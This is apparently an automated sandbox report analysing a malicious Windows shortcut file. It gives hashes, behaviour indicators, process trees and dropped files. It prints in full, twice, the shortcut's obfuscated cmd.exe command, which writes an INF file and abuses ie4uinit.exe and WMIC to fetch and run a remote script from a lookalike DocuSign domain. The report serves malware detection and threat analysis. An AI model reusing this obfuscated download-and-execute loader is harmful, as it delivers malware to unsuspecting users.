File name: 45593a7071903724aae4974d478a17784cfca63af4d3404312fb4b5ecb9e0f1c

Full analysis: https://app.any.run/tasks/58f92791-2735-4bb1-8c2e-74894b313bac
Verdict: Malicious activity
Analysis date: October 07, 2021, 10:29:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=278528, window=hide
MD5: D5DF5B266FC8C9AF26F6593F8EA771A8
SHA1: B786A7C78B746CDA42F49211FC2E437AF17D1CE4
SHA256: 45593A7071903724AAE4974D478A17784CFCA63AF4D3404312FB4B5ECB9E0F1C
SSDEEP: 96:8yGcgoiDlGKUTk3KJzQcQlmtnwC1FVu/FtXN8i3wXtVaTRdSLqDyXtsHJr6uTist:8yGEoKTVe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ie4uinit.exe (PID: 856)
      • ie4uinit.exe (PID: 3732)
    • Drops executable file immediately after starts

      • cmd.exe (PID: 3388)
  • SUSPICIOUS

    • Checks supported languages

      • ie4uinit.exe (PID: 856)
      • ie4uinit.exe (PID: 3732)
      • WMIC.exe (PID: 1876)
      • cmd.exe (PID: 3388)
    • Reads the computer name

      • ie4uinit.exe (PID: 856)
      • WMIC.exe (PID: 1876)
      • ie4uinit.exe (PID: 3732)
    • Executed via WMI

      • ie4uinit.exe (PID: 856)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3388)
    • Removes files from Windows directory

      • ie4uinit.exe (PID: 856)
    • Drops a file that was compiled in debug mode

      • cmd.exe (PID: 3388)
    • Application launched itself

      • ie4uinit.exe (PID: 856)
    • Creates files in the Windows directory

      • ie4uinit.exe (PID: 856)
    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3388)
    • Creates files in the user directory

      • cmd.exe (PID: 3388)
  • INFO

    No info indicators.
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: -
IconFileName: imageres.dll
CommandLineArguments: /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!"
RelativePath: ..\..\..\..\
LocalBasePath: -
VolumeLabel: Windows
DriveType: Fixed Disk
TargetFileDOSName: -
HotKey: (none)
RunWindow: Normal
IconIndex: 97
TargetFileSize: 278528
FileAttributes: Archive
Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 4
Malicious processes: 1
Suspicious processes: 2

Behavior graph

Processes in graph: cmd.exe, wmic.exe (no specs), ie4uinit.exe (no specs), ie4uinit.exe (no specs)

Process information

PID: 3388
CMD: "C:\Windows\System32\cmd.exe" /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!"
Path: C:\Windows\System32\cmd.exe
Indicators: -
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1876
CMD: wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"
Path: C:\Windows\System32\Wbem\WMIC.exe
Indicators: -
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: WMI Commandline Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 856
CMD: C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings
Path: C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe
Indicators: -
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: IE Per-User Initialization Utility
Exit code: 0
Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)

PID: 3732
CMD: C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache
Path: C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe
Indicators: -
Parent process: ie4uinit.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: IE Per-User Initialization Utility
Exit code: 0
Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)
Total events: 753
Read events: 660
Write events: 93
Delete events: 0

Modification events

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation: write
Name: IEPropFontName
Value: Times New Roman

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation: write
Name: IEFixedFontName
Value: Courier New

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation: write
Name: IEPropFontName
Value: Times New Roman

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation: write
Name: IEFixedFontName
Value: Courier New

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation: write
Name: IEPropFontName
Value: Times New Roman

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation: write
Name: IEFixedFontName
Value: Courier New

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation: write
Name: IEPropFontName
Value: Times New Roman

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation: write
Name: IEFixedFontName
Value: Courier New

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation: write
Name: IEPropFontName
Value: Sylfaen

(PID) Process: (856) ie4uinit.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation: write
Name: IEFixedFontName
Value: Sylfaen

Executable files: 1
Suspicious files: 0
Text files: 6
Unknown types: 0

Dropped files

PID: 3388
Process: cmd.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\ieuinit.inf
Type: ini
MD5: 6DB1797BCD95AAF5F11FCFDD990E55CE
SHA256: E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B

PID: 856
Process: ie4uinit.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
Type: text
MD5: 3098BBDD84794F3429FE02E2D7781C48
SHA256: C25F444580905AE18DDB7C254C44A8E3FDAC5B359E347F2C130B8BF7706CDB81

PID: 856
Process: ie4uinit.exe
Filename: C:\Windows\Temp\OLD4410.tmp
Type: ini
MD5: 6DB1797BCD95AAF5F11FCFDD990E55CE
SHA256: E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B

PID: 856
Process: ie4uinit.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml
Type: xml
MD5: E153C6D960F845B74F1A90AE11670556
SHA256: 4B906B6DB2836AAA38ED20EBD2D1F1DAE2394AFAD578EE83720A919C8D366D29

PID: 856
Process: ie4uinit.exe
Filename: C:\Users\admin\Favorites\Links\Web Slice Gallery.url
Type: text
MD5: 1E7E5E93C2A5AADAF932F93D25C57F3E
SHA256: 8B94D04FECE582E4182E8E73F46FB86EB8E965C69C526C42805ABB9E43641E35

PID: 3388
Process: cmd.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe
Type: executable
MD5: ACA03178C248B32343B03F4B9ACCE1B9
SHA256: C3612DA14216A2F5872BD0D140A76D1A257E9668EFA46A5CED5419E51ED30B49

PID: 856
Process: ie4uinit.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.bak
Type: text
MD5: E9E473C9777B0C24D50EE8C972A78FE2
SHA256: 90BE32975E76E679B01FF719148DF508CBBE2D7F2C47D93201F33A31994B4174
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: docusign.uk.com
IP: -
Reputation: unknown

Threats

No threats detected
No debug info